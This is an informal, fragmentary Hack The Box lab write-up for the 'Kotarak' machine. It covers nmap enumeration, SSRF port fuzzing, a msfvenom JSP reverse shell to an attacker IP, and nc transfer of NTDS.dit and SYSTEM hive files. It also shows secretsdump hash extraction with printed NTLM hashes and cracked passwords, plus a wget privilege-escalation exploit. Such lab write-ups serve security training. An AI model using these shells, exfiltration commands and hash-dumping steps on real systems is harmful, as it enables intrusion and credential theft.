HTB Write-up Kotarak

nmap: 
PORT      STATE    SERVICE  VERSION
22/tcp    open     ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e2:d7:ca:0e:b7:cb:0a:51:f7:2e:75:ea:02:24:17:74 (RSA)
|   256 e8:f1:c0:d3:7d:9b:43:73:ad:37:3b:cb:e1:64:8e:e9 (ECDSA)
|_  256 6d:e9:26:ad:86:02:2d:68:e1:eb:ad:66:a0:60:17:b8 (ED25519)
1112/tcp  filtered msql
6002/tcp  filtered X11:2
8009/tcp  open     ajp13    Apache Jserv (Protocol v1.3)
| ajp-methods: 
|   Supported methods: GET HEAD POST PUT DELETE OPTIONS
|   Potentially risky methods: PUT DELETE
|_  See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp  open     http     Apache Tomcat 8.5.5
| http-methods: 
|_  Potentially risky methods: PUT DELETE
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.5 - Error report
10009/tcp filtered swdtp-sv
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
​
8009 enum:
8009 tcp - AJP
refabr1k's Pentest Notebook
PORT     STATE SERVICE VERSION
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
| ajp-request: 
| AJP/1.3 404 404
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 992
| 
|_<!DOCTYPE html><html><head><title>Apache Tomcat/8.5.5 - Error report</title><style type="text/css">H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}.line {height: 1px; background-color: #525D76; border: none;}</style> </head><body><h1>HTTP Status 404 - /</h1><div class="line"></div><p><b>type</b> Status report</p><p><b>message</b> <u>/</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><hr class="line"><h3>Apache Tomcat/8.5.5</h3></body></html>
| ajp-headers: 
|   Content-Type: text/html;charset=utf-8
|   Content-Language: en
|_  Content-Length: 992
| ajp-methods: 
|   Supported methods: GET HEAD POST PUT DELETE OPTIONS
|   Potentially risky methods: PUT DELETE
|_  See https://nmap.org/nsedoc/scripts/ajp-methods.html
​
8080 enum: 
Apache Tomcat/8.5.5 
dirsearch result: 
`
/examples/
index,jsp
manager 
index.jsp took me to the tomcat page:
Attempted logging in to host-manager butI ot this
s3cret? 
tomcat -s3cret didn't work..lol
After running the full scan, I found port 60000 open 
possibly LFI vuln?
it looks like you can enter any url to browse so I entered my own and served http server. 
it worked.
 
if we see ueragent here we could exploit it but not this time.
​
Let's enter some values like file://etc/passwd
ok..
Now we can fuzz the local ports with wfuzz
wfuzz -z range,1-65535 http://10.129.1.117:60000/url.php\?path=http://localhost:FUZZ
got a bunch of 2Ls so let's modify our command
​
wfuzz -z range,1-65535 http://10.129.1.117:60000/url.php\?path=http://localhost:FUZZ
wfuzz -z range,1-65535 --hl=2 http://10.129.1.117:60000/url.php\?path=http://localhost:FUZZ
--hl=2 will omit the result with 2L
We can see some stuff coming back.
onport 888,found a file server 
After URL encoding the last part of the request with burp, I was able to see the content 
username: admin
password: [email protected]! 
Now we are finally in the admin portal. 
 
Make a war shell code with msfvenom 
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.14 LPORT=7777 -f war > shell.war 
Got a initial shell back after deploy the war file and started a nc listner.
 
spawn the shell. python -c 'import pty;pty.spawn("/bin/bash")'
backups looks interesting 
find . --> useful to find hidden files.
Started a listner on kali : nc -nvlp 443 > SYSTEM
nc 10.10.16.14 443 < 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin
did the same for other file. 
Now we've got the two files on our machine. 
What is the NTDS.dit File?
The NTDS.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain. By extracting these hashes, it is possible to use tools such as Mimikatz to perform pass-the-hash attacks, or tools like Hashcat to crack these passwords. The extraction and cracking of these passwords can be performed offline, so they will be undetectable. Once an attacker has extracted these hashes, they are able to act as any user on the domain, including Domain Administrators.
Extracting Hashes and Domain Info From .dit
If you have the NTDS.dit file and the SYSTEM hive, you can simply use the secretsdump.py from impacket to extract all the NT hashes, but before we begin we need to download the files locally so we can extract the database information. I’m going to create a simple python HTTP server to transfer the files from the remote victim machine to my local machine.


it took forever to download these files! I tried the nc methods but I couldn't see the progress so files kept corrupting 
python secretsdump.py -ntds 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit -system 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin LOCAL
Output 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-3G2B0H151AC$:1000:aad3b435b51404eeaad3b435b51404ee:668d49ebfdb70aeee8bcaeac9e3e66fd:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ca1ccefcb525db49828fbb9d68298eee:::
WIN2K8$:1103:aad3b435b51404eeaad3b435b51404ee:160f6c1db2ce0994c19c46a349611487:::
WINXP1$:1104:aad3b435b51404eeaad3b435b51404ee:6f5e87fd20d1d8753896f6c9cb316279:::
WIN2K31$:1105:aad3b435b51404eeaad3b435b51404ee:cdd7a7f43d06b3a91705900a592f3772:::
WIN7$:1106:aad3b435b51404eeaad3b435b51404ee:24473180acbcc5f7d2731abe05cfa88c:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
​
Time to crack some hashes! 
Since the box is not windows, we have to crack them. And we don't care about the ones with $ 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11::: 
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
separate them before the fourth colon.
​
​
Used this site to crack them. 
Decrypt MD5, SHA1, MySQL, NTLM, SHA256, SHA512, Wordpress, Bcrypt hashes for free online
admin cracked:  
f16tomcat! 
atanas - Password123! 
Let's try ssh into these. 
couldn't get in...
tried using su - atanas with the other password and it worked. 
it looks like ssh is not enabled for this account.  
Priv Esc
in root folder, we ca actually read app.log and flag.txt 
wget 1.16...
let's do searchsploit to see what we have. 
​
exploit DB: https://www.exploit-db.com/exploits/40064 
1.Pasted the wget.rc content in /dev/shm folder 
you cannot run python server on 21 but the box has a program called authbind installed and it bypasses it
​
uploading wget exploit file to the victim (modified some parts) 
 
used wget -r http://IP/exploit.py to transfer the file.
changed the http listening port to 0.0.0.0
in summary: we need to have python server & the ftp on the victims machine 
and nc running on attacker's. 
​
/root/hacked-via-wget